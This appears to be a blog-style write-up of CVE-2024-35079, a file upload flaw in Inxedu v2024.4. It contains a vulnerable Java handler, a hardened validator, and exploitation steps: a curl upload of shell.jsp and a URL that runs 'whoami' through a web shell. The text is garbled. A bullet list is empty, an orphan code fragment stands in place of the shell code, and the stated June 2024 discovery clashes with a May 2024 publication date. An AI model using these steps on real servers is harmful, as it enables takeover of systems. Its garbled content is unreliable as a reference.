CVE-2024-35079 - Arbitrary File Upload Leads to Remote Code Execution in Inxedu v2024.4
In June 2024, a serious security flaw was discovered in Inxedu v2024.4, a widely used educational management system. This vulnerability, now cataloged as CVE-2024-35079, allows attackers to upload dangerous files through the uploadAudio method, leading to remote code execution (RCE). Let’s break down how this vulnerability works, include code examples, and share how attackers might exploit it.
What Is the Issue?
The uploadAudio endpoint in Inxedu v2024.4 is intended for audio file uploads. Unfortunately, the server doesn't strictly check the file type. This means attackers can upload malicious files—for example, a crafted .jsp file that contains Java code. Once uploaded, an attacker can access this file via the web, and the server will run the attacker's code.
Why Is This Bad?
If someone can upload and execute their own code on your server, they totally control it. This type of exploit can allow an attacker to:
Technical Details
The vulnerability stems from poor validation in the uploadAudio method. Let's take a look at what the vulnerable code might look like:
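```java
// Simplified example; actual code may differ
@RequestMapping("/upload/audio")
public String uploadAudio(@RequestParam("file") MultipartFile file) throws IOException {
    // Client-supplied name is used as-is: no extension or content-type check
    String fileName = file.getOriginalFilename();
    // Written under a web-accessible directory with its original extension
    File targetFile = new File("/var/www/uploads/", fileName);
    file.transferTo(targetFile);
    return "success";
}
```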
Here, there’s no check to ensure that the file is actually an audio file. Attackers can upload any file they like—and if it’s a .jsp, the server might execute it.
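For contrast, a hardened counterpart to the simplified handler above, written with the JDK only. This is an added example, not Inxedu's code or its actual fix; the class name, the allow-list and the signature checks are assumptions, and the sample inputs in `main` are constructed.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;
import java.util.*;
public class AudioUploadValidator {
    // Assumed allow-list; keep it to the formats the application really needs.
    private static final Set<String> ALLOWED = Set.of("mp3", "wav", "ogg");

    // Stores an upload under a server-generated name, or throws if it is not audio.
    public static Path store(String originalName, InputStream in, Path uploadDir) throws IOException {
        // 1. Extension allow-list, taken from the last dot only ("a.mp3.jsp" -> "jsp").
        String name = originalName == null ? "" : originalName;
        int dot = name.lastIndexOf('.');
        String ext = dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) throw new IOException("extension not allowed: " + ext);

        // 2. Content check: the leading bytes must match a known audio signature.
        BufferedInputStream buf = new BufferedInputStream(in);
        buf.mark(12);
        byte[] head = buf.readNBytes(12);
        buf.reset();
        if (!looksLikeAudio(head)) throw new IOException("content is not audio");

        // 3. Never reuse the client's file name: the server picks name and extension.
        Path dir = uploadDir.toAbsolutePath().normalize();
        Path target = dir.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(dir)) throw new IOException("path escapes upload dir");
        Files.copy(buf, target);
        return target;
    }

    private static boolean looksLikeAudio(byte[] h) {
        String s = new String(h, StandardCharsets.ISO_8859_1);
        boolean mp3 = s.startsWith("ID3") || (h.length > 1 && (h[0] & 0xFF) == 0xFF && (h[1] & 0xE0) == 0xE0);
        boolean wav = s.startsWith("RIFF") && s.startsWith("WAVE", 8);
        return mp3 || wav || s.startsWith("OggS");
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("uploads"); // constructed demo inputs below
        byte[] wav = "RIFF\0\0\0\0WAVEfmt ".getBytes(StandardCharsets.ISO_8859_1);
        byte[] jsp = "<% /* placeholder */ %>".getBytes(StandardCharsets.ISO_8859_1);
        System.out.println("stored: " + store("lesson.wav", new ByteArrayInputStream(wav), dir).getFileName());
        for (String n : new String[] {"shell.jsp", "shell.wav"}) {
            try { store(n, new ByteArrayInputStream(jsp), dir); }
            catch (IOException e) { System.out.println(n + " rejected: " + e.getMessage()); }
        }
    }
}
```

Signature checks alone can be satisfied by a crafted file, so point `uploadDir` at a directory outside the web root, or one the servlet container never treats as JSP, so that anything that slips through is served as data rather than executed.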
out.flush();
}
```bash
curl -F "file=@shell.jsp" http://target-site.com/upload/audio
```
http://target-site.com/uploads/shell.jsp?cmd=whoami
Conclusion
CVE-2024-35079 is a severe security risk for anyone using Inxedu v2024.4. If you run this software, you must patch your system or apply mitigation steps immediately. Unchecked file upload vulnerabilities often lead to full system compromise, so don't wait until it's too late.
Timeline
Published on: 05/23/2024 19:16:01 UTC
Last modified on: 08/20/2024 15:35:13 UTC